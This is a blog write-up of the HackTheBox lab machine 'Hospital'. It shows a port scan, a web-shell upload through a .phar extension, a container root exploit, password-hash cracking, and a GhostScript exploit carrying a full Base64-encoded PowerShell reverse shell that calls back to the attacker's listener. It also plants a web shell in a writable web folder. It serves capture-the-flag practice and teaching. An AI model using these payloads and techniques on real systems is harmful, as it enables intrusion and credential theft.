cwoellner.com ~ personal website & blog

Writeup of Hospital From HackTheBox

Published on: Thursday, Dec 19, 2024

Getting a foothold

For the initial port scan, I use the following nmap command:

nmap -sS -A -Pn -T5 -p- -oN nmap.txt 10.129.229.189

And receive the following results:

PORT     STATE  SERVICE           VERSION
22/tcp   open   ssh               OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 e1:4b:4b:3a:6d:18:66:69:39:f7:aa:74:b3:16:0a:aa (ECDSA)
|_  256 96:c1:dc:d8:97:20:95:e7:01:5f:20:a2:43:61:cb:ca (ED25519)
53/tcp   open   domain            Simple DNS Plus
88/tcp   open   kerberos-sec      Microsoft Windows Kerberos (server time: 2023-11-19 04:40:02Z)
135/tcp  open   msrpc             Microsoft Windows RPC
139/tcp  open   netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open   ldap              Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
443/tcp  open   ssl/http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_http-title: Hospital Webmail :: Welcome to Hospital Webmail
445/tcp  open   microsoft-ds?
464/tcp  open   kpasswd5?
593/tcp  open   ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open   ldapssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
1801/tcp open   msmq?
2103/tcp open   msrpc             Microsoft Windows RPC
2105/tcp open   msrpc             Microsoft Windows RPC
2107/tcp open   msrpc             Microsoft Windows RPC
2179/tcp open   vmrdp?
3268/tcp open   ldap              Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
3269/tcp open   globalcatLDAPssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
3389/tcp open   ms-wbt-server     Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.hospital.htb
| Not valid before: 2023-09-05T18:39:34
|_Not valid after:  2024-03-06T18:39:34
5985/tcp open   http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6059/tcp open   msrpc             Microsoft Windows RPC
6404/tcp open   msrpc             Microsoft Windows RPC
6406/tcp open   ncacn_http        Microsoft Windows RPC over HTTP 1.0
6407/tcp open   msrpc             Microsoft Windows RPC
6409/tcp open   msrpc             Microsoft Windows RPC
6615/tcp open   msrpc             Microsoft Windows RPC
6636/tcp open   msrpc             Microsoft Windows RPC
8080/tcp closed http-proxy
9389/tcp open   mc-nmf            .NET Message Framing

I start by checking the service on port 443 and discover an instance of Roundcube webmail, since there are no recent unauthenticated exploits for Roundcube I check the other services. On port 8080 I find a simple web app that allows me to create an account and to upload a file. I use the p0wny@shell:~# and try different file extensions. The upload succeeds with a .phar file extension. The uploaded file can be found in the /uploads/ directory.

Pwning the container

Using the shell I find out that I am in an Ubuntu container.

www-data@webserver:…/html/uploads uname -a
Linux webserver 5.19.0-35-generic #36-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 3 18:36:56 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

I try to exploit CVE-2021-3493, which tends to work on most Ubuntu systems. I upload the exploit and run it, It works but the webshell cannot handle it, so I use the webshell to run a reverse shell and use the exploit from there.

After running the exploit again and getting a root shell, I take a look at /etc/shadow and dump the password hash for drwilliams.

drwilliams:$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:19612:0:99999:7:::

I then use hashcat to crack the password.

hashcat -m 1800 pw.hash rockyou.txt --show
$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:qwe123!@#

User flag

Using the credentials drwilliams:qwe123!@# I log into Roundcube webmail. I find a mail telling me to send a GhostScript file. So I look for recent GhostScript RCEs and find CVE-2023-36664

mail

I use RevShells to generate a Base64 encoded PowerShell reverse shell and a add the code as the payload for the exploit generator.

python3 CVE_2023_36664_exploit.py -g -x eps -p "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMgAiACwAMQAyADMANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="

I send the generated .eps file to Dr. Brown and wait for the reverse shell to connect back to my listener.

$ nc -lnvp 1234
Listening on 0.0.0.0 1234

Connection received on 10.129.229.189 6230
PS C:\Users\drbrown.HOSPITAL\Documents>

Now I can now use the reverse shell to navigate to the Desktop folder and obtain the user flag.

Administrator flag

I start by running winpeas and see that I have write access to C:\xampp, so check the folder and find out that this is where Roundcube is being hosted.

I put the p0wny@shell:~# from earlier in the htdocs folder (this time as a .php file) and access it via the browser.

system shell

Now I can use the shell to obtain the root flag from the Administrators desktop.

Want to chat about anything you read on here? Feel free to e-mail me at christian@cwoellner.com